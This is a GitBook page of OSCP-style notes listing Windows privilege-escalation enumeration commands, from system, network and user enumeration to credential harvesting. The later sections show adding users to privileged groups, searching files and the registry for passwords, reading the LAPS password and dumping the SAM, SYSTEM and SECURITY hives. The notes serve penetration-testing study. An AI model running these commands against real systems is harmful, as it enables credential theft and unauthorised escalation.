M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • Basic Microsoft Windows Enumeration
  • Network Information
  • Enumerating Protections
  • System Information
  • User & Group Information
  • Show hidden Files and Folders
  • User Handling
  • Credential Harvesting
  1. NOTES
  2. PRIVILEGE ESCALATION
  3. Windows

Enumeration

Basic Microsoft Windows Enumeration

whoami /all
whoami /user
systeminfo
net accounts
net user
net user /domain
net user <USERNAME>
Get-LocalUser
Get-LocalGroup
Get LocalGroupMember <GROUP>
Get-Process
tree /f C:\Users\
tasklist /SVC
sc query
sc qc <SERVICE>
netsh firewall show state
schtasks /query /fo LIST /v
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Network Information

Interface(s), IP Address(es), DNS Information

ipconfig /all

ARP Table

arp -a

Routing Table

route print

Enumerating Protections

Check Windows Defender Status

Get-MpComputerStatus

List AppLocker Rules

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Test AppLocker Policy

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

System Information

Tasklist

Using the tasklist command to look at running processes will give us a better idea of what applications are currently running on the system.

tasklist /svc

Display All Environment Variables

set

View Detailed Configuration Information

systeminfo
wmic qfe

// PowerShell
Get-HotFix | ft -AutoSize

Installed Programs

wmic product get name

// Powershell
Get-WmiObject -Class Win32_Product |  select Name, Version

Display Running Processes

The netstat command will display active TCP and UDP connections which will give us a better idea of what services are listening on which port(s) both locally and accessible to the outside.

netstat -ano

Listing Named Pipes with Pipelist

pipelist.exe /accepteula

After obtaining a listing of named pipes, we can use Accesschk to enumerate the permissions assigned to a specific named pipe by reviewing the Discretionary Access List (DACL), which shows us who has the permissions to modify, write, read, or execute a resource.

accesschk.exe /accepteula \\.\Pipe\lsass -v

Check all named pipes that allow write access

accesschk.exe -w \pipe\* -v

User & Group Information

Logged-In Users

query user

Current User

echo %USERNAME%
whoami

Current User Privileges

whoami /priv

Current User Group Information

whoami /groups

Get All Users

net user

Get All Groups

net localgroup

Details About a Group

net localgroup administrators

Get Password Policy & Other Account Information

net accounts

Show hidden Files and Folders

dir /a                          // show hidden folders
dir /a:d                        // show all hidden directories
dir /a:h                        // show all hidden files
cmd /c dir /A                   // show hidden folders
cmd /c dir /A:D                 // show all hidden directories
cmd /c dir /A:H                 // show all hidden files
powershell ls -force            // show all hidden files

User Handling

Adding Users to Groups

net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" /add <USERNAME>
net localgroup "Remote Management Users" /add <USERNAME>

Credential Harvesting

Quick Wins

cmdkey /list
rundll32 keymgr.dll, KRShowKeyMgr
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Search for Passwords

findstr /si password *.xml *.ini *.txt
dir .s *pass* == *.config
dir /s *pass* == *cred* == *vnc* == *.config*
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\<USERNAME>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.vbs -File -Recurse -ErrorAction SilentlyContinue

PowerShell History

Get-History
(Get-PSReadlineOption).HistorySavePath
type C:\Users\%username%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Saved Windows Credentials

cmdkey /list
runas /savecred /user:<USERNAME> cmd.exe

Winlogon Credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Local Administrator Password Solution (LAPS)

Get-ADComputer <RHOST> -property 'ms-mcs-admpwd'

Search the Registry for Passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Dumping Credentials

reg save hklm\system system
reg save hklm\sam sam
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

Find KeePass Databases

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Internet Information Service (IIS)

C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:*
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Unattended Windows Installations

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
PreviousWindowsNextWindows User Privileges

Last updated 23 days ago